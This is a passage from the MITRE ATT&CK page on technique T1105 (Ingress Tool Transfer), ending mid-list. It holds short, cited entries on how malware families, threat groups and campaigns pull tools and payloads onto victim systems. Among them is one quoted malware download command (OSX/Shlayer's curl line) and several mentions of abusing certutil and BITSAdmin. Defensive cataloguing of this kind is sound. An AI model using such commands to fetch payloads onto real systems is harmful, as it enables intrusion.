Ingress Tool Transfer, Technique T1105 - Enterprise (original) (raw)

C0028

2015 Ukraine Electric Power Attack

During the 2015 Ukraine Electric Power Attack, Sandworm Team pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data. [6]

C0063

2025 Poland Wiper Attacks

During the 2025 Poland Wiper Attacks, the adversaries downloaded malicious payloads to the victim server.[7]

S0469

ABK

ABK has the ability to download files from C2.[8]

S1028

Action RAT

Action RAT has the ability to download additional payloads onto an infected machine.[9]

S0331

Agent Tesla

Agent Tesla can download additional files for execution on the victim’s machine.[10][11]

S0092

Agent.btz

Agent.btz attempts to download an encrypted binary from a specified domain.[12]

G0130

Ajax Security Team

Ajax Security Team has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.[13]

S1025

Amadey

Amadey can download and execute files to further infect a host machine with additional malware.[14]

S0504

Anchor

Anchor can download additional payloads.[15][16]

G0138

Andariel

Andariel has downloaded additional tools and malware onto compromised hosts.[17]

S1074

ANDROMEDA

ANDROMEDA can download additional payloads from C2.[18]

G0099

APT-C-36

APT-C-36 has downloaded binary data from a specified domain after the malicious document is opened.[19]

G0026

APT18

APT18 can upload a file to the victim’s machine.[20]

G0007

APT28

APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.[21][22][23][24][25]

G0016

APT29

APT29 has downloaded additional tools and malware onto compromised networks.[26][27][28][29]

G0022

APT3

APT3 has a tool that can copy files to remote machines.[30]

G0050

APT32

APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.[31]

G0064

APT33

APT33 has downloaded additional files and programs from its C2 server.[32][33]

G0067

APT37

APT37 has downloaded second stage malware from compromised websites.[34][35][36][37]

G0082

APT38

APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.[38] Additionally, APT38 has downloaded other payloads onto a victim’s machine.[39]

G0087

APT39

APT39 has downloaded tools to compromised hosts.[40][41]

G0096

APT41

APT41 used certutil to download additional files.[42][43][44] APT41 downloaded post-exploitation tools such as Cobalt Strike via command shell following initial access.[45] APT41 has uploaded Procdump and NATBypass to a staging directory and has used these tools in follow-on activities.[46]

C0040

APT41 DUST

APT41 DUST involved execution of certutil.exe via web shell to download the DUSTPAN dropper.[47]

G0143

Aquatic Panda

Aquatic Panda has downloaded additional malware onto compromised hosts.[48]

S0456

Aria-body

Aria-body has the ability to download additional payloads from C2.[49]

S9031

AshTag

The AshTag stager component can retrieve and execute the main payload.[50]

S0373

Astaroth

Astaroth uses certutil and BITSAdmin to download additional malware. [51][52][53]

S1087

AsyncRAT

AsyncRAT has the ability to download files including over SFTP.[54][55]

S0438

Attor

Attor can download additional plugins, updates and other files. [56]

S0347

AuditCred

AuditCred can download files and additional malware.[57]

S0473

Avenger

Avenger has the ability to download files from C2 to a compromised host.[8]

S0344

Azorult

Azorult can download and execute additional files. Azorult has also downloaded a ransomware payload called Hermes.[58][59]

S0414

BabyShark

BabyShark has downloaded additional files from the C2.[60][61]

S0475

BackConfig

BackConfig can download and execute additional payloads on a compromised host.[62]

S0093

Backdoor.Oldrea

Backdoor.Oldrea can download additional modules from C2.[63]

G0135

BackdoorDiplomacy

BackdoorDiplomacy has downloaded additional files and tools onto a compromised host.[64]

S0642

BADFLICK

BADFLICK has download files from its C2 server.[65]

S1081

BADHATCH

BADHATCH has the ability to load a second stage malicious DLL file onto a compromised machine.[66]

S0128

BADNEWS

BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.[67][68][69]

S0337

BadPatch

BadPatch can download and execute or update malware.[70]

S0234

Bandook

Bandook can download files to the system.[71]

S0239

Bankshot

Bankshot uploads files and secondary payloads to the victim's machine.[72]

S0534

Bazar

Bazar can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike.[73][74][75][76]

S0470

BBK

BBK has the ability to download files from C2 to the infected host.[8]

S1246

BeaverTail

BeaverTail has been used to download a malicious payload to include Python based malware InvisibleFerret.[77][78][79][80][81][82]

S0574

BendyBear

BendyBear is designed to download an implant from a C2 server.[83]

S0017

BISCUIT

BISCUIT has a command to download a file from the C2 server.[84]

S0268

Bisonal

Bisonal has the capability to download files to execute on the victim’s machine.[85][86][87]

S0190

BITSAdmin

BITSAdmin can be used to create BITS Jobs to upload and/or download files.[88]

G1002

BITTER

BITTER has downloaded additional malware and tools onto a compromised host.[89][90]

G1043

BlackByte

BlackByte has transferred tools such as Cobalt Strike to victim environments from file sharing and hosting websites.[91]

S0564

BlackMould

BlackMould has the ability to download files to the victim's machine.[92]

S0520

BLINDINGCAN

BLINDINGCAN has downloaded files to a victim machine.[93]

S0657

BLUELIGHT

BLUELIGHT can download additional files onto the host.[36]

S0486

Bonadan

Bonadan can download additional modules from the C2 server.[94]

S0360

BONDUPDATER

BONDUPDATER can download or upload files from its C2 server.[95]

S0635

BoomBox

BoomBox has the ability to download next stage malware components to a compromised system.[96]

S0651

BoxCaon

BoxCaon can download files.[97]

S0204

Briba

Briba downloads files onto infected hosts.[98]

S9015

BRICKSTORM

BRICKSTORM has the ability to download files from the Adversaries C2 server to the compromised system.[99][100][101][102]

G0060

BRONZE BUTLER

BRONZE BUTLER has used various tools to download files, including DGet (a similar tool to wget).[103]

S1063

Brute Ratel C4

Brute Ratel C4 can download files to compromised hosts.[104][105]

S0471

build_downer

build_downer has the ability to download files from C2 to the infected host.[8]

S1039

Bumblebee

Bumblebee can download and execute additional payloads including through the use of a Dex command.[106][107][108]

S0482

Bundlore

Bundlore can download and execute new versions of itself.[109]

S1118

BUSHWALK

BUSHWALK can write malicious payloads sent through a web request’s command parameter.[110][111]

C0010

C0010

During C0010, UNC3890 actors downloaded tools and malware onto a compromised host.[112]

C0015

C0015

During C0015, the threat actors downloaded additional tools and files onto a compromised network.[113]

C0017

C0017

During C0017, APT41 downloaded malicious payloads onto compromised systems.[114]

C0018

C0018

During C0018, the threat actors downloaded additional tools, such as Mimikatz and Sliver, as well as Cobalt Strike and AvosLocker ransomware onto the victim network.[115][116]

C0021

C0021

During C0021, the threat actors downloaded additional tools and files onto victim machines.[117][118]

C0026

C0026

During C0026, the threat actors downloaded malicious payloads onto select compromised hosts.[18]

C0027

C0027

During C0027, Scattered Spider downloaded tools using victim organization systems.[119]

S0274

Calisto

Calisto has the capability to upload and download files to the victim's machine.[120]

S0077

CallMe

CallMe has the capability to download a file to the victim from the C2 server.[121]

S9016

Caminho

Caminho has the ability to download files onto compromised hosts.[122]

S0351

Cannon

Cannon can download a payload for execution.[123]

S0484

Carberp

Carberp can download and execute new plugins from the C2 server. [124][125]

S0348

Cardinal RAT

Cardinal RAT can download and execute additional payloads.[126]

S0465

CARROTBALL

CARROTBALL has the ability to download and install a remote payload.[127]

S0462

CARROTBAT

CARROTBAT has the ability to download and execute a remote file via certutil.[128]

S1224

CASTLETAP

CASTLETAP can transfer files to compromised network devices.[129]

S0572

Caterpillar WebShell

Caterpillar WebShell has a module to download and upload files to the system.[130]

S0160

certutil

certutil can be used to download files from a given URL.[131][132]

S0631

Chaes

Chaes can download additional files onto an infected machine.[133]

S0674

CharmPower

CharmPower has the ability to download additional modules to a compromised host.[134]

S0144

ChChes

ChChes is capable of downloading files, including additional modules.[135][136][137]

G0114

Chimera

Chimera has remotely copied tools and malware onto targeted systems.[138]

S1149

CHIMNEYSWEEP

CHIMNEYSWEEP can download additional files from C2.[139]

S0020

China Chopper

China Chopper's server component can download remote files.[140][141][142][143][144]

S0023

CHOPSTICK

CHOPSTICK is capable of performing remote file transmission.[145]

S0667

Chrommme

Chrommme can download its code from C2.[146]

G1021

Cinnamon Tempest

Cinnamon Tempest has downloaded files, including Cobalt Strike, to compromised hosts.[147]

S0054

CloudDuke

CloudDuke downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.[28]

S0106

cmd

cmd can be used to copy files to/from a remotely connected external system.[148]

G0080

Cobalt Group

Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers.[149][4] The group's JavaScript backdoor is also capable of downloading files.[150]

S0154

Cobalt Strike

Cobalt Strike can deliver additional payloads to victim machines.[151][152]

S0369

CoinTicker

CoinTicker executes a Python script to download its second stage.[153]

S0608

Conficker

Conficker downloads an HTTP server to the infected machine.[154]

G0142

Confucius

Confucius has downloaded additional files and payloads onto a compromised host following initial access.[155][156]

S0492

CookieMiner

CookieMiner can download additional scripts from a web server.[157]

S0137

CORESHELL

CORESHELL downloads another dropper from its C2 server.[158]

S0614

CostaBricks

CostaBricks has been used to load SombRAT onto a compromised host.[159]

C0004

CostaRicto

During CostaRicto, the threat actors downloaded malware and tools onto a compromised host.[159]

S1023

CreepyDrive

CreepyDrive can download files to the compromised host.[160]

S0115

Crimson

Crimson contains a command to retrieve files from its C2 server.[161][162][163]

S0498

Cryptoistic

Cryptoistic has the ability to send and receive files.[164]

S0527

CSPY Downloader

CSPY Downloader can download additional tools to a compromised host.[165]

S0625

Cuba

Cuba can download files from its C2 server.[166]

C0029

Cutting Edge

During Cutting Edge, threat actors leveraged exploits to download remote files to Ivanti Connect Secure VPNs.[167]

S0687

Cyclops Blink

Cyclops Blink has the ability to download files to target systems.[168][169]

S0497

Dacls

Dacls can download its payload from a C2 server.[164][170]

G1034

Daggerfly

Daggerfly has used PowerShell and BITSAdmin to retrieve follow-on payloads from external locations for execution on victim machines.[171]

S1014

DanBot

DanBot can download additional files to a targeted system.[172]

S0334

DarkComet

DarkComet can load any files onto the infected machine to execute.[173][174]

S1111

DarkGate

DarkGate retrieves cryptocurrency mining payloads and commands in encrypted traffic from its command and control server.[175] DarkGate uses Windows Batch scripts executing the curl command to retrieve follow-on payloads.[176] DarkGate has stolen sitemanager.xml and recentservers.xml from %APPDATA%\FileZilla\ if present.[177]

G0012

Darkhotel

Darkhotel has used first-stage payloads that download additional malware from C2 servers.[178]

S1066

DarkTortilla

DarkTortilla can download additional packages for keylogging, cryptocurrency mining, and other capabilities; it can also retrieve malicious payloads such as Agent Tesla, AsyncRat, NanoCore, RedLine, Cobalt Strike, and Metasploit.[179]

S0187

Daserf

Daserf can download remote files.[180][103]

S0255

DDKONG

DDKONG downloads and uploads files on the victim’s machine.[181]

S0616

DEATHRANSOM

DEATHRANSOM can download files to a compromised host.[182]

S0354

Denis

Denis deploys additional backdoors and hacking tools to the system.[183]

S0659

Diavol

Diavol can receive configuration updates and additional payloads including wscpy.exe from C2.[184]

S0200

Dipsind

Dipsind can download remote files.[185]

S1088

Disco

Disco can download files to targeted systems via SMB.[186]

S1021

DnsSystem

DnsSystem can download files to compromised systems after receiving a command with the string downloaddd.[187]

S0213

DOGCALL

DOGCALL can download and execute additional payloads.[188]

S0600

Doki

Doki has downloaded scripts from C2.[189]

S0695

Donut

Donut can download and execute previously staged shellcode payloads.[190]

S0472

down_new

down_new has the ability to download files to the compromised host.[8]

S0134

Downdelph

After downloading its main config file, Downdelph downloads multiple payloads from C2 servers.[191]

S9021

DOWNIISSA

DOWNIISSA can download files to the compromised host.[192]

G0035

Dragonfly

Dragonfly has copied and installed tools for operations once in the victim environment.[193]

S0694

DRATzarus

DRATzarus can deploy additional tools onto an infected machine.[194]

S0547

DropBook

DropBook can download and execute additional files.[195][196]

S0502

Drovorub

Drovorub can download files to a compromised host.[197]

S0567

Dtrack

Dtrack’s can download and upload a file to the victim’s computer.[198][199]

S1159

DUSTTRAP

DUSTTRAP can retrieve and load additional payloads.[47]

S0024

Dyre

Dyre has a command to download and executes additional files.[200]

S0624

Ecipekac

Ecipekac can download additional payloads to a compromised host.[201]

S0554

Egregor

Egregor has the ability to download files from its C2 server.[202][203]

G0066

Elderwood

The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location.[204]

S0081

Elise

Elise can download additional files from the C2 server for execution.[205]

S0082

Emissary

Emissary has the capability to download files from the C2 server.[206]

S0367

Emotet

Emotet can download follow-on payloads and items via malicious url parameters in obfuscated PowerShell code.[207]

S0363

Empire

Empire can upload and download to and from a victim machine.[208]

S0404

esentutl

esentutl can be used to copy files from a given URL.[209]

S0396

EvilBunny

EvilBunny has downloaded additional Lua scripts from the C2.[210]

S0568

EVILNUM

EVILNUM can download and upload files to the victim's computer.[211][212]

G0120

Evilnum

Evilnum can deploy additional components or tools as needed.[211]

S0401

Exaramel for Linux

Exaramel for Linux has a command to download a file from and to a remote C2 server.[213][214]

S0569

Explosive

Explosive has a function to download a file to the infected system.[215]

S0171

Felismus

Felismus can download files from remote servers.[216]

S0267

FELIXROOT

FELIXROOT downloads and uploads files to and from the victim’s machine.[217][218]

G1016

FIN13

FIN13 has downloaded additional tools and malware to compromised systems.[219][220]

G0046

FIN7

FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.[221][222][223][224]

G0061

FIN8

FIN8 has used remote code execution to download subsequent payloads.[225][226]

S0696

Flagpro

Flagpro can download additional malware from the C2 server.[227]

S0381

FlawedAmmyy

FlawedAmmyy can transfer files from C2.[228]

S0661

FoggyWeb

FoggyWeb can receive additional malicious components from an actor controlled C2 server and execute them on a compromised AD FS server.[229]

G0117

Fox Kitten

Fox Kitten has downloaded additional tools including PsExec directly to endpoints.[230]

C0001

Frankenstein

During Frankenstein, the threat actors downloaded files and tools onto a victim machine.[231]

S0095

ftp

ftp may be abused by adversaries to transfer tools or files from an external system into a compromised environment.[232][233]

S1044

FunnyDream

FunnyDream can download additional files onto a compromised host.[234]

C0007

FunnyDream

During FunnyDream, the threat actors downloaded additional droppers and backdoors onto a compromised system.[234]

S0628

FYAnti

FYAnti can download additional payloads to a compromised host.[201]

G0093

GALLIUM

GALLIUM dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN.[235][92]

G0047

Gamaredon Group

Gamaredon Group has downloaded additional malware and tools onto a compromised host.[236][237][238][239][240][241] For example, Gamaredon Group uses a backdoor script to retrieve and decode additional payloads once in victim environments.[242]

S0168

Gazer

Gazer can execute a task to download a file.[243][244]

S0666

Gelsemium

Gelsemium can download additional plug-ins to a compromised host.[146]

S0032

gh0st RAT

gh0st RAT can download files to the victim’s machine.[245][246]

S9010

GlassWorm

GlassWorm has downloaded additional payloads from C2.[247][248][249][250]

S0249

Gold Dragon

Gold Dragon can download additional components from the C2 server.[251]

S0493

GoldenSpy

GoldenSpy constantly attempts to download and execute files from the remote C2, including GoldenSpy itself if not found on the system.[252]

S0588

GoldMax

GoldMax can download and execute additional files.[253][254]

S1138

Gootloader

Gootloader can fetch second stage code from hardcoded web domains.[255][256]

G0078

Gorgon Group

Gorgon Group malware can download additional files from C2 servers.[257]

S0531

Grandoreiro

Grandoreiro can download its second stage from a hardcoded URL within the loader's code.[258][259]

S0342

GreyEnergy

GreyEnergy can download additional modules and payloads.[218]

S0632

GrimAgent

GrimAgent has the ability to download and execute additional payloads.[260]

S0561

GuLoader

GuLoader can download further malware for execution on the victim's machine.[261]

S0132

H1N1

H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.[262]

G0125

HAFNIUM

HAFNIUM has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host.[263][143]

S0499

Hancitor

Hancitor has the ability to download additional files from C2.[264]

S1211

Hannotog

Hannotog can download additional files to the victim machine.[265]

S0214

HAPPYWORK

can download and execute a second-stage payload.[34]

S1229

Havoc

Havoc has the ability to upload files to infected systems.[266][267]

S0170

Helminth

Helminth can download additional files.[268]

G1001

HEXANE

HEXANE has downloaded additional payloads and malicious scripts onto a compromised host.[269]

S1249

HexEval Loader

HexEval Loader has been used to download a malicious payload to include BeaverTail.[270][78][79]

S0087

Hi-Zor

Hi-Zor has the ability to upload and download files from its C2 server.[271]

S9023

HiddenFace

HiddenFace can download files from the C2 to victim systems.[272][273]

S0394

HiddenWasp

HiddenWasp downloads a tar compressed archive from a download server to the system.[274]

S0009

Hikit

Hikit has the ability to download files to a compromised host.[275]

S0601

Hildegard

Hildegard has downloaded additional scripts that build and run Monero cryptocurrency miners.[276]

C0038

HomeLand Justice

During HomeLand Justice, threat actors used web shells to download files to compromised infrastructure.[277]

S0376

HOPLIGHT

HOPLIGHT has the ability to connect to a remote host in order to upload and download files.[278]

S0431

HotCroissant

HotCroissant has the ability to upload a file from the command and control (C2) server to the victim machine.[279]

S0070

HTTPBrowser

HTTPBrowser is capable of writing a file to the compromised system from the C2 server.[280]

S9007

HTTPTroy

HTTPTroy has the ability to download files from C2 using the down <FILENAME> command.[281]

S0203

Hydraq

Hydraq creates a backdoor through which remote attackers can download files and additional malware components.[282][283]

S0398

HyperBro

HyperBro has the ability to download additional files.[284]

S0483

IcedID

IcedID has the ability to download additional modules and a configuration file from C2.[285][286][287][288]

S1152

IMAPLoader

IMAPLoader is a loader used to retrieve follow-on payload encoded in email messages for execution on victim systems.[289]

G1032

INC Ransom

INC Ransom has downloaded tools to compromised servers including Advanced IP Scanner. [290][291]

G0136

IndigoZebra

IndigoZebra has downloaded additional files and tools from its C2 server.[97]

G0119

Indrik Spider

Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host.[292][293][294]

S0604

Industroyer

Industroyer downloads a shellcode payload from a remote C2 server and loads it into memory.[295]

S1245

InvisibleFerret

InvisibleFerret has downloaded "AnyDesk.exe" into the user’s home directory from the C2 server when checks for the service fail to identify its presence in the victim environment.[80] InvisibleFerret has also been configured to download additional payloads using a command which calls to the /bow URI.[296][81]

S0260

InvisiMole

InvisiMole can upload files to the victim's machine for operations.[297][298]

S0015

Ixeshe

Ixeshe can download and execute additional files.[299]

S0528

Javali

Javali can download payloads from remote C2 servers.[53]

S0044

JHUHUGIT

JHUHUGIT can retrieve an additional payload from its C2 server.[300][301] JHUHUGIT has a command to download files to the victim’s machine.[302]

S0201

JPIN

JPIN can download files and upgrade itself.[185]

S0283

jRAT

jRAT can download and execute files.[303][304][305]

S0648

JSS Loader

JSS Loader has the ability to download malicious executables to a compromised host.[306]

S0215

KARAE

KARAE can upload and download files, including second-stage malware.[34]

S0088

Kasidet

Kasidet has the ability to download and execute additional files.[307]

S0265

Kazuar

Kazuar downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.[308]

G0004

Ke3chang

Ke3chang has used tools to download files to compromised machines.[309]

S0585

Kerrdown

Kerrdown can download specific payloads to a compromised host based on OS architecture.[310]

S0487

Kessel

Kessel can download additional modules from the C2 server.[94]

S1020

Kevin

Kevin can download files to the compromised host.[269]

S0387

KeyBoy

KeyBoy has a download and upload functionality.[311][312]

S0271

KEYMARBLE

KEYMARBLE can upload files to the victim’s machine and can download additional payloads.[313]

S0526

KGH_SPY

KGH_SPY has the ability to download and execute code from remote servers.[165]

G0094

Kimsuky

Kimsuky has downloaded additional scripts, tools, and malware onto victim systems.[314][43][315][316]

S0599

Kinsing

Kinsing has downloaded additional lateral movement scripts from C2.[317]

S0437

Kivars

Kivars has the ability to download and execute files.[318]

S0250

Koadic

Koadic can download additional files and tools.[319][320]

S0669

KOCTOPUS

KOCTOPUS has executed a PowerShell command to download a file to the system.[320]

S0356

KONNI

KONNI can download files and execute them on the victim’s machine.[321][322]

C0035

KV Botnet Activity

KV Botnet Activity included the use of scripts to download additional payloads when compromising network nodes.[323]

S0236

Kwampirs

Kwampirs downloads additional files from C2 servers.[324]

S1160

Latrodectus

Latrodectus can download and execute PEs, DLLs, and shellcode from C2.[288][325][326]

G0032

Lazarus Group

Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host.[327][328][329][164][170][330][331][332][333][334]

G0140

LazyScripter

LazyScripter had downloaded additional tools to a compromised host.[320]

G0065

Leviathan

Leviathan has downloaded additional scripts and files from adversary-controlled servers.[335][140]

S0395

LightNeuron

LightNeuron has the ability to download and execute additional files.[336]

S1185

LightSpy

On macOS, LightSpy downloads a .json file from the C2 server. The .json file contains metadata about the plugins to be downloaded, including their URL, name, version, and MD5 hash. LightSpy retrieves the plugins specified in the .json file, which are compiled .dylib files. These .dylib files provide task and platform specific functionality. LightSpy also imports open-source libraries to manage socket connections.[337]

S0211

Linfo

Linfo creates a backdoor through which remote attackers can download files onto compromised hosts.[338]

S0513

LiteDuke

LiteDuke has the ability to download files.[339]

S0680

LitePower

LitePower has the ability to download payloads containing system commands to a compromised host.[340]

S0681

Lizar

Lizar can download additional plugins, files, and tools.[341][342][343]

S9020

LODEINFO

LODEINFO has the ability to download additional files from the C2.[344][345][346]

S0447

Lokibot

Lokibot downloaded several staged items onto the victim's machine.[347]

S0451

LoudMiner

LoudMiner used SCP to update the miner from the C2.[348]

S0042

LOWBALL

LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.[349]

S0532

Lucifer

Lucifer can download and execute a replica of itself using certutil.[350]

G1014

LuminousMoth

LuminousMoth has downloaded additional malware and tools onto a compromised host.[351][352]

S0409

Machete

Machete can download additional files for execution on the victim’s machine.[353]

S1016

MacMa

MacMa has downloaded additional files, including an exploit for used privilege escalation.[354][355]

S1048

macOS.OSAMiner

macOS.OSAMiner has used curl to download a Stripped Payloads from a public facing adversary-controlled webpage.

S1060

Mafalda

Mafalda can download additional files onto the compromised host.[356]

G0059

Magic Hound

Magic Hound has downloaded additional code and files from servers onto victims.[357][358][359][360]

S1182

MagicRAT

MagicRAT can import and execute additional payloads.[361]

S0652

MarkiRAT

MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin.[362]

S0500

MCMD

MCMD can upload additional files to a compromised host.[363]

S0459

MechaFlounder

MechaFlounder has the ability to upload and download files to and from a compromised host.[364]

G1051

Medusa Group

Medusa Group has leveraged certutil, PowerShell, and Windows Command to download additional tools to include RMM services.[365] Medusa Group has also engaged in "Bring Your Own Vulnerable Driver" (BYOVD) and downloaded vulnerable or signed drivers to the victim environment to disable security tools.[365][366]

S0530

Melcoz

Melcoz has the ability to download additional files to a compromised host.[53]

G0045

menuPass

menuPass has installed updates and new malware on victims.[367][368]

G1013

Metador

Metador has downloaded tools and malware onto a compromised system.[369]

S1059

metaMain

metaMain can download files onto compromised systems.[369][356]

S0455

Metamorfo

Metamorfo has used MSI files to download additional files to execute.[370][371][372][373]

S0688

Meteor

Meteor has the ability to download additional files for execution on the victim's machine.[374]

S0339

Micropsia

Micropsia can download and execute an executable from the C2 server.[375][376]

S1015

Milan

Milan has received files from C2 and stored them in log folders beginning with the character sequence a9850d2f.[377]

S0051

MiniDuke

MiniDuke can download additional encrypted backdoors onto the victim via GIF files.[378][339]

S0084

Mis-Type

Mis-Type has downloaded additional malware and files onto a compromised host.[379]

S0083

Misdat

Misdat is capable of downloading files from the C2.[379]

S0080

Mivast

Mivast has the capability to download and execute .exe files.[380]

S0079

MobileOrder

MobileOrder has a command to download a file from the C2 server to the victim mobile device's SD card.[121]

S0553

MoleNet

MoleNet can download additional payloads from the C2.[195]

G0021

Molerats

Molerats used executables to download malicious files from different sources.[381][382]

S1026

Mongall

Mongall can download files to targeted systems.[383]

G1036

Moonstone Sleet

Moonstone Sleet retrieved a final stage payload from command and control infrastructure during initial installation on victim systems.[384]

S0284

More_eggs

More_eggs can download and launch additional payloads.[385][386]

G1009

Moses Staff

Moses Staff has downloaded and installed web shells to following path C:\inetpub\wwwroot\aspnet_client\system_web\IISpool.aspx.[387]

S0256

Mosquito

Mosquito can upload and download files to the victim.[388]

S9032

MuddyViper

MuddyViper has the ability to download files from the C2 server. Additionally, MuddyViper has the ability to download a file in chunks with sleep time between each chunk.[389]

G0069

MuddyWater

MuddyWater has used malware that can upload additional files to the victim’s machine.[390][391][392][393] MuddyWater has used PowerShell commands to install remote management and monitoring (RMM) software on the victim’s machine to conduct espionage and to exfiltrate data.[394]

G0129

Mustang Panda

Mustang Panda has downloaded additional executables following the initial infection stage.[395][396][397][398] Mustang Panda has also leveraged Visual Studio Code code.exe and Dev Tunnels using DevTunnel.exe to propagate additional tools and payloads.[399]

G1020

Mustard Tempest

Mustard Tempest has deployed secondary payloads and third stage implants to compromised hosts.[400]

S0228

NanHaiShu

NanHaiShu can download additional files from URLs.[335]

S0336

NanoCore

NanoCore has the capability to download and activate additional modules for execution.[401][402]

S0247

NavRAT

NavRAT can download files remotely.[403]

S0272

NDiskMonitor

NDiskMonitor can download and execute a file from given URL.[69]

S0630

Nebulae

Nebulae can download files from C2.[404]

S1189

Neo-reGeorg

Neo-reGeorg has the ability to download files to targeted systems.[405]

S0691

Neoichor

Neoichor can download additional files onto a compromised host.[309]

S0210

Nerex

Nerex creates a backdoor through which remote attackers can download files onto a compromised host.[204]

S0457

Netwalker

Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.[406]

S0198

NETWIRE

NETWIRE can downloaded payloads from C2 to the compromised host.[407][408]

S1192

NICECURL

NICECURL has the ability to download additional content onto an infected machine, e.g. by using curl.[409]

S0118

Nidiran

Nidiran can download and execute files.[410]

C0002

Night Dragon

During Night Dragon, threat actors used administrative utilities to deliver Trojan components to remote systems.[411]

S1090

NightClub

NightClub can load multiple additional plugins on an infected host.[186]

S0385

njRAT

njRAT can download files to the victim’s machine.[412][413] APT-C-36 has used modified versions of njRAT to enable the download of .NET assemblies.[414]

S0353

NOKKI

NOKKI has downloaded a remote module for execution.[415]

G0133

Nomadic Octopus

Nomadic Octopus has used malicious macros to download additional files to the victim's machine.[416]

S0340

Octopus

Octopus can download additional files and tools onto the victim’s machine.[417][418][416]

S1170

ODAgent

ODAgent has the ability to download and execute files on compromised systems.[419]

S1172

OilBooster

OilBooster can download and execute files from an actor-controlled OneDrive account.[419]

S1171

OilCheck

OilCheck can download staged payloads from an actor-controlled infrastructure.[419]

G0049

OilRig

OilRig had downloaded remote files onto victim infrastructure.[420][421]

S0439

Okrum

Okrum has built-in commands for uploading, downloading, and executing files to the system.[422]

S0264

OopsIE

OopsIE can download files from its C2 server to the victim's machine.[423][424]

C0022

Operation Dream Job

During Operation Dream Job, Lazarus Group downloaded multistage malware and tools onto a compromised host.[194][425][426]

C0006

Operation Honeybee

During Operation Honeybee, the threat actors downloaded additional malware and malicious scripts onto a compromised host.[427]

C0048

Operation MidnightEclipse

During Operation MidnightEclipse, threat actors downloaded additional payloads on compromised devices.[428][429]

C0013

Operation Sharpshooter

During Operation Sharpshooter, additional payloads were downloaded after a target was infected with a first-stage downloader.[430]

C0014

Operation Wocao

During Operation Wocao, threat actors downloaded additional files to the infected system.[431]

S0229

Orz

Orz can download files onto the victim.[335]

S0402

OSX/Shlayer

OSX/Shlayer can download payloads, and extract bytes from files. OSX/Shlayer uses the curl -fsL "$url" >$tmp_path command to download malicious payloads into a temporary directory.[432][433][434][435]

S0352

OSX_OCEANLOTUS.D

OSX_OCEANLOTUS.D has a command to download and execute a file on the victim’s machine.[436][437]

C0042

Outer Space

During Outer Space, OilRig downloaded additional tools to comrpomised infrastructure.[438]

S1017

OutSteel

OutSteel can download files from its C2 server.[439]

S0598

P.A.S. Webshell

P.A.S. Webshell can upload and download files to and from compromised hosts.[214]

S0626

P8RAT

P8RAT can download additional payloads to a target system.[201]

S0664

Pandora

Pandora can load additional drivers and files onto a victim machine.[440]

S0208

Pasam

Pasam creates a backdoor through which remote attackers can upload files.[441]

G0040

Patchwork

Patchwork payloads download additional files from the C2 server.[442][69]

S0587

Penquin

Penquin can execute the command code do_download to retrieve remote files from C2.[443]

S0643

Peppy

Peppy can download and execute remote files.[161]

S9014

PHASEJAM

PHASEJAM has the ability to upload files onto the compromised appliance.[444]

S9028

PHPsert

PHPsert has the ability to retrieve remote payloads.[445]

S0501

PipeMon

PipeMon can install additional modules via C2 commands.[446]

S0124

Pisloader

Pisloader has a command to upload a file to the victim machine.[447]

S0254

PLAINTEE

PLAINTEE has downloaded and executed additional plugins.[181]

G0068

PLATINUM

PLATINUM has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel.[448]

G1040

Play

Play has used Cobalt Strike to download files to compromised machines.[449]

S0435

PLEAD

PLEAD has the ability to upload and download files to and from an infected host.[450]

S0013

PlugX

PlugX has a module to download and execute files on the compromised machine.[451][452][453][454]

S0428

PoetRAT

PoetRAT has the ability to copy files and download/upload files into C2 channels using FTP and HTTPS.[455][456]

S0012

PoisonIvy

PoisonIvy creates a backdoor through which remote attackers can upload files.[457]

S0518

PolyglotDuke

PolyglotDuke can retrieve payloads from the C2 server.[339]

S0453

Pony

Pony can download additional files onto the infected system.[458]

S0150

POSHSPY

POSHSPY downloads and executes additional PowerShell code and Windows binaries.[459]

S0139

PowerDuke

PowerDuke has a command to download a file.[460]

S1173

PowerExchange

PowerExchange can decode Base64-encoded files and call WriteAllBytes to write the files to compromised hosts.[461]

S1012

PowerLess

PowerLess can download additional payloads to a compromised host.[462]

S0685

PowerPunch

PowerPunch can download payloads from adversary infrastructure.[239]

S0145

POWERSOURCE

POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims.[463]

S0223

POWERSTATS

POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.[464]

S0184

POWRUNER

POWRUNER can download or upload files from its C2 server.[420]

S0613

PS1

CostaBricks can download additional payloads onto a compromised host.[159]

S0078

Psylo

Psylo has a command to download a file to the system from its C2 server.[121]

S0147

Pteranodon

Pteranodon can download and execute additional files.[236][465][466]

S1228

PUBLOAD

PUBLOAD has acted as a stager that can download the next-stage payload from its C2 server.[467][468][469][470][471] PUBLOAD has also delivered FDMTP as a secondary control tool and PTSOCKET for exfiltration to some infected systems.[472]

S0196

PUNCHBUGGY

PUNCHBUGGY can download additional files and payloads to compromised hosts.[473][474]

S0192

Pupy

Pupy can upload and download to/from a victim machine.[475]

S9019

PureCrypter

PureCrypter can download additional payloads for execution on the compromised host.[476][477]

S0650

QakBot

QakBot has the ability to download additional components and malware.[478][479][480][481][482][483]

C0055

